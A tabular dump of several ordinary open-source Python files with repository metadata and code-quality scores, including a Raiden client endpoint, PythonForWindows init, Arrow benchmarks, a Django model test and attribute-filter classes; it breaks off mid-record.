hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
918902fd69d740a78465a7c0e8ff7c9040a2834a | 1,448 | py | Python | raiden_client/endpoints/connections_connect.py | s0b0lev/raiden-client-python | 4eecdda10650f081e4449449949067af6356d542 | [
"MIT"
] | 3 | 2019-08-01T12:47:16.000Z | 2020-07-05T15:28:53.000Z | raiden_client/endpoints/connections_connect.py | s0b0lev/raiden-client-python | 4eecdda10650f081e4449449949067af6356d542 | [
"MIT"
] | 17 | 2019-08-01T07:51:58.000Z | 2020-05-29T09:48:37.000Z | raiden_client/endpoints/connections_connect.py | s0b0lev/raiden-client-python | 4eecdda10650f081e4449449949067af6356d542 | [
"MIT"
] | null | null | null | from typing import Any, Dict
from raiden_client import utils
from raiden_client.endpoints import BaseEndpoint
class Connect(BaseEndpoint):
"""Automatically join a token network.
PUT /api/(version)/connections/(token_address)
"""
connection = None
def __init__(self,
token_address: str,
funds: int,
initial_channel_target: int = None,
joinable_funds_target: float = None) -> None:
self.token_address = utils.normalize_address_eip55(token_address)
self.funds = funds
self.initial_channel_target = initial_channel_target
self.joinable_funds_target = joinable_funds_target
@property
def name(self) -> str:
return "connect"
@property
def endpoint(self) -> str:
return f"/connections/{self.token_address}"
@property
def method(self) -> str:
return "put"
def payload(self) -> Dict[str, Any]:
data: Dict[str, Any] = {"funds": self.funds}
if self.initial_channel_target:
data["initial_channel_target"] = self.initial_channel_target
if self.joinable_funds_target:
data["joinable_funds_target"] = self.joinable_funds_target
return data
def from_dict(self, response: Dict[str, Any]) -> None:
self.connection = response
def to_dict(self) -> Dict[str, Any]:
return {"connection": self.connection}
| 28.392157 | 73 | 0.642265 | 166 | 1,448 | 5.36747 | 0.289157 | 0.094276 | 0.13468 | 0.080808 | 0.065095 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001874 | 0.263122 | 1,448 | 50 | 74 | 28.96 | 0.833177 | 0.05732 | 0 | 0.088235 | 0 | 0 | 0.074815 | 0.056296 | 0 | 0 | 0 | 0 | 0 | 1 | 0.205882 | false | 0 | 0.088235 | 0.117647 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
91899bf4d3ae7e46d7ab666e1b29186df70d9b7a | 1,152 | py | Python | windows/__init__.py | kimtaehong/PythonForWindows | d04eed1754e2e23474213b89580d68e1b73c3fe4 | [
"BSD-3-Clause"
] | 1 | 2020-08-02T09:35:14.000Z | 2020-08-02T09:35:14.000Z | windows/__init__.py | kimtaehong/PythonForWindows | d04eed1754e2e23474213b89580d68e1b73c3fe4 | [
"BSD-3-Clause"
] | null | null | null | windows/__init__.py | kimtaehong/PythonForWindows | d04eed1754e2e23474213b89580d68e1b73c3fe4 | [
"BSD-3-Clause"
] | 1 | 2020-09-21T14:46:44.000Z | 2020-09-21T14:46:44.000Z | """
Python for Windows
A lot of python object to help navigate windows stuff
Exported:
system : :class:`windows.winobject.System`
current_process : :class:`windows.winobject.CurrentProcess`
current_thread : :class:`windows.winobject.CurrentThread`
"""
# check we are on windows
import sys
if sys.platform != "win32":
raise NotImplementedError("It's called PythonForWindows not PythonFor{0}".format(sys.platform.capitalize()))
import warnings
warnings.filterwarnings('once', category=DeprecationWarning, module=__name__)
from windows import winproxy
from windows import winobject
from .winobject.system import System
from .winobject.process import CurrentProcess, CurrentThread, WinProcess, WinThread
from .winobject.file import WinFile
system = System()
current_process = CurrentProcess()
current_thread = CurrentThread()
del System
del CurrentProcess
del CurrentThread
# Late import: other imports should go here
# Do not move it: risk of circular import
import windows.utils
import windows.wintrust
import windows.syswow64
import windows.com
import windows.pipe
__all__ = ["system", 'current_process', 'current_thread']
| 24 | 112 | 0.788194 | 140 | 1,152 | 6.385714 | 0.5 | 0.072707 | 0.07047 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00498 | 0.128472 | 1,152 | 47 | 113 | 24.510638 | 0.885458 | 0.317708 | 0 | 0 | 0 | 0 | 0.114691 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.545455 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
91a2e33b80eabbb7ab7ccd98f223bba69fe010db | 421 | py | Python | dbag/dbag_metric_types.py | PolicyStat/dbag | 8541d692f52e23242ac7f5669903569f5927eece | [
"MIT"
] | 1 | 2019-09-15T16:47:47.000Z | 2019-09-15T16:47:47.000Z | dbag/dbag_metric_types.py | PolicyStat/dbag | 8541d692f52e23242ac7f5669903569f5927eece | [
"MIT"
] | 4 | 2015-12-18T18:45:18.000Z | 2019-07-18T18:58:52.000Z | dbag/dbag_metric_types.py | PolicyStat/dbag | 8541d692f52e23242ac7f5669903569f5927eece | [
"MIT"
] | null | null | null | from django.conf import settings
from dbag import dbag_manager
from dbag.metric_types import QueryMetric
class UserMetric(QueryMetric):
query_model = settings.AUTH_USER_MODEL
dbag_manager.register_metric_type('users_metric', UserMetric)
class ActiveUsersCount(UserMetric):
default_query_filter = {'key': 'is_active', 'value': True}
dbag_manager.register_metric_type('active_users_count', ActiveUsersCount)
| 24.764706 | 73 | 0.814727 | 53 | 421 | 6.150943 | 0.528302 | 0.101227 | 0.116564 | 0.153374 | 0.177914 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.104513 | 421 | 16 | 74 | 26.3125 | 0.864721 | 0 | 0 | 0 | 0 | 0 | 0.111639 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.777778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
91a568129f1c208a2106665459edcdb528524d07 | 481 | py | Python | deckz/cli/watch_standalones.py | m09/deckz | 0f97ef2a43c2c714ac18173a4fe3266cccba31e2 | [
"Apache-2.0"
] | null | null | null | deckz/cli/watch_standalones.py | m09/deckz | 0f97ef2a43c2c714ac18173a4fe3266cccba31e2 | [
"Apache-2.0"
] | 41 | 2020-04-06T13:49:18.000Z | 2020-12-24T11:14:47.000Z | deckz/cli/watch_standalones.py | m09/deckz | 0f97ef2a43c2c714ac18173a4fe3266cccba31e2 | [
"Apache-2.0"
] | null | null | null | from logging import getLogger
from pathlib import Path
from deckz.cli import app
from deckz.paths import GlobalPaths
from deckz.watching import watch_standalones as watching_watch_standalones
_logger = getLogger(__name__)
@app.command()
def watch_standalones(minimum_delay: int = 5, current_dir: Path = Path(".")) -> None:
"""Compile standalones on change."""
watching_watch_standalones(
minimum_delay, current_dir, GlobalPaths.from_defaults(current_dir)
)
| 28.294118 | 85 | 0.773389 | 61 | 481 | 5.819672 | 0.491803 | 0.180282 | 0.135211 | 0.157746 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002433 | 0.14553 | 481 | 16 | 86 | 30.0625 | 0.861314 | 0.06237 | 0 | 0 | 0 | 0 | 0.002247 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.454545 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
91ae994aab8db1081b64d37bba1ddd56b64104cd | 3,202 | py | Python | setup.py | easyScience/easy-Crystallography | c551cc13077108033befde710387afcd09f3e557 | [
"BSD-3-Clause"
] | null | null | null | setup.py | easyScience/easy-Crystallography | c551cc13077108033befde710387afcd09f3e557 | [
"BSD-3-Clause"
] | 13 | 2022-01-04T18:14:08.000Z | 2022-03-31T22:23:10.000Z | setup.py | easyScience/easy-Crystallography | c551cc13077108033befde710387afcd09f3e557 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from setuptools import setup
packages = [
"easyCrystallography",
"easyCrystallography.Components",
"easyCrystallography.Elements",
"easyCrystallography.Structures",
"easyCrystallography.Symmetry",
"easyCrystallography.io",
]
package_data = {"": ["*"]}
install_requires = [
"easysciencecore>=0.2.2"
]
setup_kwargs = {
"name": "easycrystallography",
"version": "0.1.1",
"description": "Crystallography in easyScience",
"long_description": '# [![License][50]][51] [![Release][32]][33] [![Downloads][70]][71] [![CI Build][20]][21] \n\n[![CodeFactor][83]][84] [![Lines of code][81]](<>) [![Total lines][80]](<>) [![Files][82]](<>)\n\n\n<img height="80"><img src="https://raw.githubusercontent.com/easyScience/easyCore/master/resources/images/ec_logo.svg" height="65">\n\n**easyCore** is the foundation of the *easyScience* universe, providing the building blocks for libraries and applications which aim to make scientific data simulation and analysis easier.\n\n## Install\n\n**easyCore** can be downloaded using pip:\n\n```pip install easysciencecore```\n\nOr direct from the repository:\n\n```pip install https://github.com/easyScience/easyCore```\n\n## Test\n\nAfter installation, launch the test suite:\n\n```python -m pytest```\n\n## Documentation\n\nDocumentation can be found at:\n\n[https://easyScience.github.io/easyCore](https://easyScience.github.io/easyCore)\n\n## Contributing\nWe absolutely welcome contributions. **easyCore** is maintained by the ESS and on a volunteer basis and thus we need to foster a community that can support user questions and develop new features to make this software a useful tool for all users while encouraging every member of the community to share their ideas.\n\n## License\nWhile **easyCore** is under the BSD-3 license, DFO_LS is subject to the GPL license.\n\n<!---CI Build Status--->\n\n[20]: https://github.com/easyScience/easyCore/workflows/CI%20using%20pip/badge.svg\n\n[21]: https://github.com/easyScience/easyCore/actions\n\n\n<!---Release--->\n\n[32]: https://img.shields.io/pypi/v/easyScienceCore.svg\n\n[33]: https://pypi.org/project/easyScienceCore\n\n\n<!---License--->\n\n[50]: https://img.shields.io/github/license/easyScience/easyCore.svg\n\n[51]: https://github.com/easyScience/easyCore/blob/master/LICENSE.md\n\n\n<!---Downloads--->\n\n[70]: https://img.shields.io/pypi/dm/easyScienceCore.svg\n\n[71]: https://pypi.org/project/easyScienceCore\n\n<!---Code statistics--->\n\n[80]: https://tokei.rs/b1/github/easyScience/easyCore\n\n[81]: https://tokei.rs/b1/github/easyScience/easyCore?category=code\n\n[82]: https://tokei.rs/b1/github/easyScience/easyCore?category=files\n\n[83]: https://www.codefactor.io/repository/github/easyscience/easycore/badge\n\n[84]: https://www.codefactor.io/repository/github/easyscience/easycore\n',
"author": "Simon Ward",
"author_email": None,
"maintainer": None,
"maintainer_email": None,
"url": "https://github.com/easyScience/easyCrystallography",
"packages": packages,
"package_data": package_data,
"install_requires": install_requires,
"python_requires": ">=3.7,<3.11",
}
setup(**setup_kwargs)
| 86.540541 | 2,377 | 0.718926 | 460 | 3,202 | 4.973913 | 0.4 | 0.030594 | 0.048077 | 0.054633 | 0.241696 | 0.137675 | 0.137675 | 0.089161 | 0 | 0 | 0 | 0.026171 | 0.093067 | 3,202 | 36 | 2,378 | 88.944444 | 0.761708 | 0.006558 | 0 | 0 | 0 | 0.034483 | 0.877949 | 0.121422 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.034483 | 0 | 0.034483 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
91b15ecf522c5f6659ca4ec04b9e192aebb6141d | 2,687 | py | Python | python/benchmarks/convert_builtins.py | hrabeale/arrow | 4009b62086dfa43a4fd8bfa714772716e6531c6f | [
"Apache-2.0"
] | null | null | null | python/benchmarks/convert_builtins.py | hrabeale/arrow | 4009b62086dfa43a4fd8bfa714772716e6531c6f | [
"Apache-2.0"
] | null | null | null | python/benchmarks/convert_builtins.py | hrabeale/arrow | 4009b62086dfa43a4fd8bfa714772716e6531c6f | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import pyarrow as pa
from . import common
# TODO:
# - test dates and times
class ConvertPyListToArray(object):
"""
Benchmark pa.array(list of values, type=...)
"""
size = 10 ** 5
types = ('int32', 'uint32', 'int64', 'uint64',
'float32', 'float64', 'bool', 'decimal',
'binary', 'binary10', 'ascii', 'unicode',
'int64 list', 'struct', 'struct from tuples')
param_names = ['type']
params = [types]
def setup(self, type_name):
gen = common.BuiltinsGenerator()
self.ty, self.data = gen.get_type_and_builtins(self.size, type_name)
def time_convert(self, *args):
pa.array(self.data, type=self.ty)
class InferPyListToArray(object):
"""
Benchmark pa.array(list of values) with type inference
"""
size = 10 ** 5
types = ('int64', 'float64', 'bool', 'decimal', 'binary', 'ascii',
'unicode', 'int64 list')
# TODO add 'struct' when supported
param_names = ['type']
params = [types]
def setup(self, type_name):
gen = common.BuiltinsGenerator()
self.ty, self.data = gen.get_type_and_builtins(self.size, type_name)
def time_infer(self, *args):
arr = pa.array(self.data)
assert arr.type == self.ty
class ConvertArrayToPyList(object):
"""
Benchmark pa.array.to_pylist()
"""
size = 10 ** 5
types = ('int32', 'uint32', 'int64', 'uint64',
'float32', 'float64', 'bool', 'decimal',
'binary', 'binary10', 'ascii', 'unicode',
'int64 list', 'struct')
param_names = ['type']
params = [types]
def setup(self, type_name):
gen = common.BuiltinsGenerator()
self.ty, self.data = gen.get_type_and_builtins(self.size, type_name)
self.arr = pa.array(self.data, type=self.ty)
def time_convert(self, *args):
self.arr.to_pylist()
| 30.191011 | 76 | 0.639747 | 344 | 2,687 | 4.930233 | 0.386628 | 0.035377 | 0.030071 | 0.038915 | 0.445755 | 0.411557 | 0.411557 | 0.341981 | 0.341981 | 0.341981 | 0 | 0.024781 | 0.23409 | 2,687 | 88 | 77 | 30.534091 | 0.79932 | 0.352066 | 0 | 0.634146 | 0 | 0 | 0.154442 | 0 | 0 | 0 | 0 | 0.022727 | 0.02439 | 1 | 0.146341 | false | 0 | 0.04878 | 0 | 0.560976 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
91b7d869fa9953036a4b5438c2880c1f0721e82f | 1,317 | py | Python | codes/globo_videos_cuts/core/tests/models/processed_video_model_test_case.py | lariodiniz/teste_meta | 3bf043df3ee76871d68a3f8aea7c3ecd53765fec | [
"MIT"
] | null | null | null | codes/globo_videos_cuts/core/tests/models/processed_video_model_test_case.py | lariodiniz/teste_meta | 3bf043df3ee76871d68a3f8aea7c3ecd53765fec | [
"MIT"
] | null | null | null | codes/globo_videos_cuts/core/tests/models/processed_video_model_test_case.py | lariodiniz/teste_meta | 3bf043df3ee76871d68a3f8aea7c3ecd53765fec | [
"MIT"
] | null | null | null | # coding: utf-8
__author__ = "Lário dos Santos Diniz"
from django.test import TestCase
from model_mommy import mommy
from core.models import ProcessedVideo
class ProcessedVideoModelTestCase(TestCase):
"""Class Testing Model processed """
def setUp(self):
"""
Initial Test Settings
"""
self.processed_video = mommy.make(ProcessedVideo)
def tearDown(self):
"""Final method"""
self.processed_video.delete()
def test_there_are_fields(self):
"""test the fields the model"""
self.assertTrue('title' in dir(ProcessedVideo), 'Class Program does not have the field title')
self.assertTrue('duration' in dir(ProcessedVideo), 'Class Program does not have the field start_time')
self.assertTrue('name' in dir(ProcessedVideo), 'Class Program does not have the field end_time')
def test_there_is_a_program(self):
"""test if you are creating a Program correctly"""
self.assertEquals(ProcessedVideo.objects.count(), 1)
self.assertEquals(ProcessedVideo.objects.all()[0].title, self.processed_video.title)
self.assertEquals(ProcessedVideo.objects.all()[0].duration, self.processed_video.duration)
self.assertEquals(ProcessedVideo.objects.all()[0].name, self.processed_video.name)
| 35.594595 | 110 | 0.700076 | 160 | 1,317 | 5.64375 | 0.39375 | 0.071982 | 0.099668 | 0.163898 | 0.302326 | 0.302326 | 0.166113 | 0.166113 | 0.166113 | 0.166113 | 0 | 0.004713 | 0.194381 | 1,317 | 36 | 111 | 36.583333 | 0.846371 | 0.114655 | 0 | 0 | 0 | 0 | 0.156863 | 0 | 0 | 0 | 0 | 0 | 0.388889 | 1 | 0.222222 | false | 0 | 0.166667 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
91b8992a13b8b45015222e13beff8de3feab39c5 | 8,270 | py | Python | model_compression_toolkit/common/target_platform/targetplatform2framework/attribute_filter.py | haihabi/model_optimization | 97372a9596378bb2287c59f1180b5059f741b2d6 | [
"Apache-2.0"
] | 42 | 2021-10-31T10:17:49.000Z | 2022-03-21T08:51:46.000Z | model_compression_toolkit/common/target_platform/targetplatform2framework/attribute_filter.py | haihabi/model_optimization | 97372a9596378bb2287c59f1180b5059f741b2d6 | [
"Apache-2.0"
] | 6 | 2021-10-31T15:06:03.000Z | 2022-03-31T10:32:53.000Z | model_compression_toolkit/common/target_platform/targetplatform2framework/attribute_filter.py | haihabi/model_optimization | 97372a9596378bb2287c59f1180b5059f741b2d6 | [
"Apache-2.0"
] | 18 | 2021-11-01T12:16:43.000Z | 2022-03-25T16:52:37.000Z | # Copyright 2022 Sony Semiconductors Israel, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import operator
from typing import Any, Callable, Dict
class Filter:
"""
Filter a layer configuration by its attributes.
"""
def match(self, layer_config: Dict[str, Any]):
"""
Check whether the passed configuration matches the filter.
Args:
layer_config: Layer's configuration to check.
Returns:
Whether the passed configuration matches the filter or not.
"""
raise Exception('Filter did not implement match')
class AttributeFilter(Filter):
"""
Wrap a key, value and an operation to filter a layer's configuration according to.
If the layer's configuration has the key, and its' value matches when applying the operator,
the configuration matches the AttributeFilter.
"""
def __init__(self,
attr: str,
value: Any,
op: Callable):
"""
Args:
attr (str): Attribute to filter a layer's configuration according to.
value (Any): Value to filter to filter a layer's configuration according to.
op (Callable): Operator to check if when applied on a layer's configuration value it holds with regard to the filter's value field.
"""
self.attr = attr
self.value = value
self.op = op
def __eq__(self, other: Any) -> bool:
"""
Check whether an object is equal to the AttributeFilter or not.
Args:
other: Object to check if it is equal to the AttributeFilter or not.
Returns:
Whether the object is equal to the AttributeFilter or not.
"""
if not isinstance(other, AttributeFilter):
return False
return self.attr == other.attr and \
self.value == other.value and \
self.op == other.op
def __or__(self, other: Any):
"""
Create a filter that combines multiple AttributeFilters with a logic OR between them.
Args:
other: Filter to add to self with logic OR.
Returns:
OrAttributeFilter that filters with OR between the current AttributeFilter and the passed AttributeFilter.
"""
if not isinstance(other, AttributeFilter):
raise Exception("Not an attribute filter. Can not run an OR operation.")
return OrAttributeFilter(self, other)
def __and__(self, other: Any):
"""
Create a filter that combines multiple AttributeFilters with a logic AND between them.
Args:
other: Filter to add to self with logic AND.
Returns:
AndAttributeFilter that filters with AND between the current AttributeFilter and the passed AttributeFilter.
"""
if not isinstance(other, AttributeFilter):
raise Exception("Not an attribute filter. Can not run an AND operation.")
return AndAttributeFilter(self, other)
def match(self,
layer_config: Dict[str, Any]) -> bool:
"""
Check whether the passed configuration matches the filter.
Args:
layer_config: Layer's configuration to check.
Returns:
Whether the passed configuration matches the filter or not.
"""
if self.attr in layer_config:
return self.op(layer_config.get(self.attr), self.value)
return False
def op_as_str(self):
"""
Returns: A string representation for the filter.
"""
raise Exception("Filter must implement op_as_str ")
def __repr__(self):
return f'{self.attr} {self.op_as_str()} {self.value}'
class OrAttributeFilter(Filter):
"""
AttributeFilter to filter by multiple filters with logic OR between them.
"""
def __init__(self, *filters: AttributeFilter):
"""
Args:
*filters: List of filters to apply a logic OR between them when filtering.
"""
self.filters = filters
def match(self,
layer_config: Dict[str, Any]) -> bool:
"""
Check whether a layer's configuration matches the filter or not.
Args:
layer_config: Layer's configuration to check.
Returns:
Whether a layer's configuration matches the filter or not.
"""
for f in self.filters:
if f.match(layer_config):
return True
return False
def __repr__(self):
"""
Returns: A string representation for the filter.
"""
return ' | '.join([str(f) for f in self.filters])
class AndAttributeFilter(Filter):
"""
AttributeFilter to filter by multiple filters with logic AND between them.
"""
def __init__(self, *filters):
self.filters = filters
def match(self,
layer_config: Dict[str, Any]) -> bool:
"""
Check whether the passed configuration matches the filter.
Args:
layer_config: Layer's configuration to check.
Returns:
Whether the passed configuration matches the filter or not.
"""
for f in self.filters:
if not f.match(layer_config):
return False
return True
def __repr__(self):
"""
Returns: A string representation for the filter.
"""
return ' & '.join([str(f) for f in self.filters])
class Greater(AttributeFilter):
"""
Filter configurations such that it matches configurations
that have an attribute with a value that is greater than the value that Greater holds.
"""
def __init__(self,
attr: str,
value: Any):
super().__init__(attr=attr, value=value, op=operator.gt)
def op_as_str(self): return ">"
class GreaterEq(AttributeFilter):
"""
Filter configurations such that it matches configurations
that have an attribute with a value that is greater or equal than the value that GreaterEq holds.
"""
def __init__(self, attr: str, value: Any):
super().__init__(attr=attr, value=value, op=operator.ge)
def op_as_str(self): return ">="
class Smaller(AttributeFilter):
"""
Filter configurations such that it matches configurations that have an attribute with a value that is smaller than the value that Smaller holds.
"""
def __init__(self, attr: str, value: Any):
super().__init__(attr=attr, value=value, op=operator.lt)
def op_as_str(self): return "<"
class SmallerEq(AttributeFilter):
"""
Filter configurations such that it matches configurations that have an attribute with a value that is smaller or equal than the value that SmallerEq holds.
"""
def __init__(self, attr: str, value: Any):
super().__init__(attr=attr, value=value, op=operator.le)
def op_as_str(self): return "<="
class NotEq(AttributeFilter):
"""
Filter configurations such that it matches configurations that have an attribute with a value that is not equal to the value that NotEq holds.
"""
def __init__(self, attr: str, value: Any):
super().__init__(attr=attr, value=value, op=operator.ne)
def op_as_str(self): return "!="
class Eq(AttributeFilter):
"""
Filter configurations such that it matches configurations that have an attribute with a value that equals to the value that Eq holds.
"""
def __init__(self, attr: str, value: Any):
super().__init__(attr=attr, value=value, op=operator.eq)
def op_as_str(self): return "="
| 30.62963 | 159 | 0.627328 | 1,025 | 8,270 | 4.950244 | 0.160976 | 0.026015 | 0.04119 | 0.045723 | 0.650966 | 0.628892 | 0.604454 | 0.568388 | 0.515175 | 0.493496 | 0 | 0.001352 | 0.284764 | 8,270 | 269 | 160 | 30.743494 | 0.856467 | 0.484401 | 0 | 0.369048 | 0 | 0 | 0.064034 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.309524 | false | 0 | 0.02381 | 0.083333 | 0.607143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
91bdc573b37fa9d1295d9a5362b369a4418186c6 | 359 | py | Python | backend/apps/currency/models.py | jorgejimenez98/backend-evaluacion-desempenno | 08975303952608809375c5e2185bf20a84cc0f4e | [
"MIT"
